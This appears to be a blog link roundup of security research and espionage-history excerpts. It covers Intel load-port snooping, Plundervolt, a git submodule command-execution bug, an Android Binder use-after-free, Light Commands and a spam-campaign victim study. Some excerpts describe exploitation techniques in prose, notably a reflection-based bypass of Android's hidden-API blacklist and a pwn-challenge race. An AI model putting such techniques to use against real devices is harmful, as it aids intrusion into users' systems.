> In this paper I present an analysis of 1,976 unsolicited answers received from the targets of a malicious email campaign, who were mostly unaware that they were not contacting the real sender of the malicious messages. I received the messages because the spammers, whom I had described previously on my blog, decided to take revenge by putting my email address in the ‘reply-to’ field of a malicious email campaign. Many of the victims were unaware that the message they had received was fake and contained malware. Some even asked me to resend the malware as it had been blocked by their anti-virus product. I have read those 1,976 messages, analysed and classified victims’ answers, and present them here. The key takeaway is that we need to train users, but at the same time we should not count on them to react properly to Internet threats. Despite dealing with cybercrime victims daily for the last seven years I was surprised by most of the reactions and realized how little we, as the security industry, know about the average Internet user’s ability (or rather inability) to identify threats online. We need to build solutions that will protect users, without their knowledge, sometimes against their will, from their ability to harm themselves.
> The fifth group is actually the most worrying. I call this group ‘MY ANTI-VIRUS WORKED, PLEASE SEND AGAIN’, as these are recipients who mention that their security product (mostly anti-virus) warned them against an infected file, but they wanted the file to be resent because they could not open it. The group consisted of 44 individuals (2.35%).
How to explain the KGB's amazing success identifying CIA agents in the field?
> Their argument was simple. How could these disasters have happened with such regularity if the agency had not been penetrated by Soviet moles? The problem with this line of thought was that it did not so much overestimate CIA security as underestimate the brainpower of their Russian counterparts.
> Despite being highly privileged and processing untrusted input by design, it is unsandboxed and has poor mitigation coverage. Any vulnerabilities in this process are critical, and easily accessible to remote attackers.
EASYCHAIR - CIA covert listening devices
> EASYCHAIR – also written as Easy Chair or EC – was the codename of a super secret research project, initiated by the US Central Intelligence Agency (CIA), aiming to develop covert listening devices (bugs) based on the principle of the Resonant Cavity Microphone – also known as The Great Seal Bug or The Thing – that had been found in 1952 in the study of the US ambassador’s residency in Moscow, hidden in a donated wooden carving of the Great Seal of the United States.
> Upon discovery of The Thing, many US agencies – including the CIA – investigated the possibility of using the new – hitherto unknown – technology to its own advantage. The secret research took place in the Netherlands at the Dutch Radar Laboratory (NRP) in Noordwijk.
CPU Introspection: Intel Load Port Snooping
> We’re going to go into a unique technique for observing and sequencing all load port traffic on Intel processors. By using a CPU vulnerability from the MDS set of vulnerabilities, specifically multi-architectural load port data sampling (MLPDS, CVE-2018-12127), we are able to observe values which fly by on the load ports. Since (to my knowledge) all loads must end up going through load ports, regardless of requestor, origin, or caching, this means in theory, all contents of loads ever performed can be observed. By using a creative scanning technique we’re able to not only view “random” loads as they go by, but sequence loads to determine the ordering and timing of them.
> We’ll go through some examples demonstrating that this technique can be used to view all loads as they are performed on a cycle-by-cycle basis. We’ll look into an interesting case of the micro-architecture updating accessed and dirty bits using a microcode assist. These are invisible loads dispatched on the CPU on behalf of the user when a page is accessed for the first time.
Hackers hit Norsk Hydro with ransomware
> The breach last March would ultimately affect all 35,000 Norsk Hydro employees across 40 countries, locking the files on thousands of servers and PCs. The financial impact would eventually approach $71 million.
> All of that damage had been set in motion three months earlier when one employee unknowingly opened an infected email from a trusted customer. That allowed hackers to invade the IT infrastructure and covertly plant their virus.
This is kinda fluffy, but somewhat interesting.
So We Don'T Have A Solution For Catalina...Yet
> With the release of macOS 10.15 (Catalina), Apple has dropped support for running 32-bit executables and removed the 32-bit versions of system frameworks and libraries. Most Windows applications our users run with CrossOver are 32-bit and CrossOver uses a 32-bit Mac executable, system frameworks, and libraries to run them. This will break with Catalina.
And then comes the fun part:
> We have built a modified version of the standard C language compiler for macOS, Clang, to automate many of the changes we need to make to Wine’s behavior without pervasive changes to Wine’s source code.
> First, our version of Clang understands both 32- and 64-bit pointers. We are able to control from a broad level down to a detailed level which pointers in Wine’s source code need to be 32-bit and which 64-bit. Any code which substitutes for Windows at the interface with the Windows app has to use 32-bit pointers. On the other hand, the interfaces to the system libraries are always 64-bit.
Git submodule update command execution
> The git submodule update operation can lead to execution of arbitrary shell commands defined in the .gitmodules file.
> Modern processors are being pushed to perform faster than ever before - and with this comes increases in heat and power consumption. To manage this, many chip manufacturers allow frequency and voltage to be adjusted as and when needed. But more than that, they offer the user the opportunity to modify the frequency and voltage through priviledged software interfaces. With Plundervolt we showed that these software interfaces can be exploited to undermine the system’s security. We were able to corrupt the integrity of Intel SGX on Intel Core processors by controling the voltage when executing enclave computations. This means that even Intel SGX’s memory encryption/authentication technology cannot protect against Plundervolt.
Not sure anyone should care about SGX anymore, all things considered, but for completeness, here’s another one.
Introducing iVerify, the security toolkit for iPhone users
> Not only does iVerify help you keep your data confidential and limit data sharing, it helps protect the integrity of your device. It’s normally almost impossible to tell if your iPhone has been hacked, but our app gives you a heads-up. iVerify periodically scans your device for anomalies that might indicate it’s been compromised, gives you a detailed report on what was detected, and provides actionable advice on how to proceed.
drgn - Scriptable debugger library
> drgn (pronounced “dragon“) is a debugger-as-a-library. In contrast to existing debuggers like GDB which focus on breakpoint-based debugging, drgn excels in live introspection. drgn exposes the types and variables in a program for easy, expressive scripting in Python.
Analyzing Android's CVE-2019-2215 (/dev/binder UAF)
> Over the past few weeks, those of you who frequent the DAY streams over on our Twitch may have seen me working on trying to understand the recent Android Binder Use-After-Free (UAF) published by Google’s Project Zero (p0). This bug is actually not new, the issue was discovered and fixed in the mainline kernel in February 2018, however, p0 discovered many popular devices did not receive the patch downstream. Some of these devices include the Pixel 2, the Huawei P20, and Samsung Galaxy S7, S8, and S9 phones. I believe many of these devices received security patches within the last couple weeks that finally killed the bug.
> After a few streams of poking around with a kernel debugger on a virtual machine (running Android-x86), and testing with a vulnerable Pixel 2, I’ve came to understand the exploit written by Jann Horn and Maddie Stone pretty well. Without an understanding of Binder (the binder_thread object specifically), as well as how Vectored I/O works, the exploit can be pretty confusing. It’s also quite clever how they exploited this issue, so I thought it would be cool to write up how the exploit works.
It’s super easy to bypass Android’s hidden API restrictions
> The API blacklist tracks who’s calling a function. If the source isn’t exempt, it crashes. In the first example, the source is the app. However, in the second example, the source is the system itself. Instead of using reflection to get what we want directly, we’re using it to tell the system to get what we want. Since the source of the call to the hidden function is the system, the blacklist doesn’t affect us anymore.
The call is coming from inside the system!
The 3 A.M. Phone Call
> It went to a national security adviser, Zbigniew Brzezinski, who was awakened on 9 November 1979, to be told that the North American Aerospace Defense Command (NORAD), the combined U.S.–Canada military command–was reporting a Soviet missile attack. Just before Brzezinski was about to call President Carter, the NORAD warning turned out to be a false alarm. It was one of those moments in Cold War history when top officials believed they were facing the ultimate threat. The apparent cause? The routine testing of an overworked computer system.
Gomium pwn challenge
> By doing the above we create a race where we access the implementation of X with the context of good that means if we “win” then inside the unsafe implementation f from the bad context will be used as a function pointer instead of a pointer to an integer. This will result in calling an arbitrary address (0x1337 in our case) which sounds quite promising.
Exploiting torn reads for fun and profit.
History of Information
Lots of little facts organized in various ways.
> Light Commands is a vulnerability of MEMS microphones that allows attackers to remotely inject inaudible and invisible commands into voice assistants, such as Google assistant, Amazon Alexa, Facebook Portal, and Apple Siri using light.
> In our paper we demonstrate this effect, successfully using light to inject malicious commands into several voice controlled devices such as smart speakers, tablets, and phones across large distances and through glass windows.
Two New Tools that Tame the Treachery of Files
> Parsing is hard, even when a file format is well specified. But when the specification is ambiguous, it leads to unintended and strange parser and interpreter behaviors that make file formats susceptible to security vulnerabilities. What if we could automatically generate a “safe” subset of any file format, along with an associated, verified parser? That’s our collective goal in Dr. Sergey Bratus’s DARPA SafeDocs program.
> We’ve developed two new tools that take the pain out of parsing and make file formats safer:
> PolyFile: A polyglot-aware file identification utility with manually instrumented parsers that can semantically label the bytes of a file hierarchically; and
> PolyTracker: An automated instrumentation framework that efficiently tracks input file taint through the execution of a program.
Defense at Scale
> Last year, my colleague Chris Rohlf gave a keynote at BSidesNOLA entitled “Offense at Scale”. Offense sounds fun. Pwn all the things. And you’re always going to win! And normally I’m a big fan of being massively offensive. Unfortunately, I find myself on the defense when it comes to information security.
> Here’s how you defend at scale. Can’t be done. The end. Everything’s fucked. You’re pwned.
Plenty of good points here. Also a fun read.
Confession of Kim Philby made public for first time